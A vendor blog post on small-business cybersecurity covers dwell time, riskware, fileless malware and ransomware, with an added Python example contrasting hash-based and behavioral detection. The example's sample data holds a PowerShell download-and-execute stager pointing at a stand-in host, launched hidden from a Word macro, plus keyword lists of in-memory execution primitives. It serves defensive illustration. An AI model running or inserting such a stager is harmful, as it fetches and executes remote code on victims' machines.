The biggest cybersecurity threat to your business is not the one you can see – it is the silent breach that compromises your network without being noticed and executes on its objective only when you can no longer fight back. Data security rests on two kinds of controls: preventive controls, which an attacker gets past with the patience to find the flaws every system eventually has, and reactive controls, which only work if a human notices the intrusion and acts on it.
If your preventive controls can be compromised without anyone noticing, the reactive controls never trigger and hackers circumvent them completely. That is the strategy ransomware and other, more persistent forms of malware have relied on to get past defenses, yet individual and organizational attitudes toward cybersecurity consistently remain passive. This is what puts smaller businesses lacking resources at risk: all a cybercriminal has to do to breach your network is fool the one system you rely on.
Network Breach Dwell Time – Undiscovered Threats
A study of smaller and midmarket businesses by Infocyte found that SMBs consistently experienced persistent malware infections with “dwell times” of up to 798 days. Dwell time is the period between when an infection first occurs and when it is finally detected, and it varies by attack type (ransomware, for example, showed an average dwell time of only 43 days in the study). Dwell time does not include how long it then takes to actually remove the malicious files, so the figures quoted by Infocyte are a lower bound on the total time between infection and cleanup.
Fileless Malware, Riskware & Hidden Ransomware
A significant contributing factor to the success of these attacks is the rise of different types of infection vehicle. Hackers are leveraging existing network security gaps while at the same time deploying modified forms of malware to trick preventive antivirus controls.
An example of the former is riskware, which, as the study cited above illustrates, can go unnoticed by businesses for even longer than persistent malware. Any legitimate program that cybercriminals can abuse falls into this category, which includes many otherwise benign applications. Because riskware encompasses so many common, non-malicious programs, it is much harder to separate genuine threats from normal activity, especially when relying on automated tools like antivirus software.
The same is true of the more advanced forms of malware, including the much more destructive ransomware appearing lately. LockerGoga, MegaCortex and the targeted infections of Baltimore, Philadelphia and other cities often spread by slipping past the built-in protections of programs like Microsoft Office, then staying silent until they had gained control of the domain and could begin encrypting files or locking users out entirely. Fileless malware relies on the same idea: preventive tools, to save time and resources, typically look only for traditional infection footprints such as malicious files on disk, so code that runs entirely in memory or through legitimate system tools is never examined.
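To make the fileless point concrete, here is an added example (not SWK's code and not from the original post) that runs two kinds of check over three constructed, Sysmon-style process-creation events: a file-hash blocklist, standing in for a signature-based preventive control, and a behavioral check that looks at which process launched which and decodes PowerShell's -EncodedCommand argument. The event data, the hash placeholders, the 192.0.2.10 address and the keyword lists are all assumptions made for the example; the Office-macro-to-PowerShell stager it contains is a constructed illustration of the pattern described above, not a real capture.

```python
import base64
import re

# Process names we treat as interesting (hypothetical, minimal lists for the example)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Keywords that indicate a download-and-run-in-memory stager inside a decoded PowerShell command
SUSPICIOUS_PS = ("iex", "invoke-expression", "downloadstring", "net.webclient", "frombase64string")
# powershell.exe accepts -e, -ec, -enc and -EncodedCommand (prefix matching), case-insensitively
ENC_RE = re.compile(r"(?i)[-/](?:e|ec|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]+)")


def encode_ps(command: str) -> str:
    """-EncodedCommand takes the base64 of the UTF-16LE encoding of the script text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str):
    """Return the decoded -EncodedCommand payload, or None if absent or not valid base64/UTF-16LE."""
    match = ENC_RE.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed process-creation events in a Sysmon-like shape (hypothetical data, not a real capture).
# The hash values are placeholders for the hash of each legitimate, signed executable image.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage.ps1')"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe quarterly_report.txt",
     "Hashes": "SHA256=HASH_OF_NOTEPAD"},
    # A macro in a Word document launching a hidden PowerShell that pulls its payload straight into memory
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc " + encode_ps(STAGER),
     "Hashes": "SHA256=HASH_OF_POWERSHELL"},
    # An administrator running an encoded but harmless command from the desktop
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -Enc " + encode_ps("Get-Date"),
     "Hashes": "SHA256=HASH_OF_POWERSHELL"},
]
# Blocklist of known-bad file hashes; nothing matches because no malicious file ever touched disk
KNOWN_BAD_HASHES = {"SHA256=HASH_OF_SOME_KNOWN_TROJAN"}


def signature_scan(events, known_bad_hashes):
    """What a purely file-based control sees: only process images whose hash is on the blocklist."""
    return [e for e in events if e["Hashes"] in known_bad_hashes]


def behavioral_scan(events):
    """Inspect parent/child relationships and command lines instead of files on disk."""
    findings = []
    for e in events:
        image, parent = basename(e["Image"]), basename(e["ParentImage"])
        reasons = []
        if image in SHELLS and parent in OFFICE_PARENTS:
            reasons.append(f"office app {parent} spawned {image}")
        decoded = decode_encoded_command(e["CommandLine"])
        if decoded is not None:
            reasons.append("encoded PowerShell command")
            hits = [k for k in SUSPICIOUS_PS if k in decoded.lower()]
            if hits:
                reasons.append("in-memory download/execute: " + ", ".join(hits))
        if reasons:
            findings.append({"Image": e["Image"], "Parent": e["ParentImage"],
                             "reasons": reasons, "decoded": decoded})
    return findings


if __name__ == "__main__":
    print("signature scan hits:", signature_scan(SAMPLE_EVENTS, KNOWN_BAD_HASHES))
    for finding in behavioral_scan(SAMPLE_EVENTS):
        print(finding["Parent"], "->", finding["Image"])
        for reason in finding["reasons"]:
            print("   ", reason)
        if finding["decoded"]:
            print("    decoded:", finding["decoded"])
```

The hash scan returns nothing for all three events, because the only executables involved are Windows' own notepad.exe and powershell.exe; the malicious content exists only as a command-line argument and, once decoded, in memory. The behavioral scan flags the Word-launched PowerShell on three separate grounds and the administrator's encoded command on one, which is the kind of graded signal a human analyst, not a file scanner, has to triage.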
Criminal Penetration Testing
In response to diminishing returns from mass-volume cyber attacks, some skilled hackers are taking advantage of the gap between preventive and reactive network security to quietly form a new racket. It is essentially a cybercriminal’s form of penetration testing, and it is notable because it departs from the historical pattern of executing the attack as soon as the breach succeeds. Instead, the perpetrator retraces their steps and documents the whole process so that it can be reused or sold to other parties.
The only evidence of this emerging tactic is the eerie similarity between LockerGoga, MegaCortex, Ryuk, SamSam and other ransomware files, together with the complete lack of a breach footprint in many infections. The trend is worrying for several reasons: it signals not only the ability and commitment to apply human intelligence to cybercrime, but also, judging by the results, a frightening efficiency in choosing targets of opportunity.
What adds to the danger of discreet cybercrime is the technology being deployed to give hackers an edge. While AI has not yet reached the point of performing cost-effective hacking on its own, machine learning and other automated tools can significantly speed up the data-gathering phase for cybercriminals. Collecting intelligence faster allows hackers to act on vulnerabilities before they are found and patched, opening up a tremendous number of opportunities to circumvent preventive controls at their leisure.
The Best SMB Cybersecurity Solution is Human Intelligence
Hackers have recognized the weaknesses of automated security controls – so should you if you want to keep your business safe from their depredations. Organizations can no longer afford to passively wait for preventive systems to make an impact. Keeping cybercriminals from breaching your network requires a proactive approach.
Contact SWK to find out how we can improve your network defense using preemptive tactics to stop hackers in their tracks.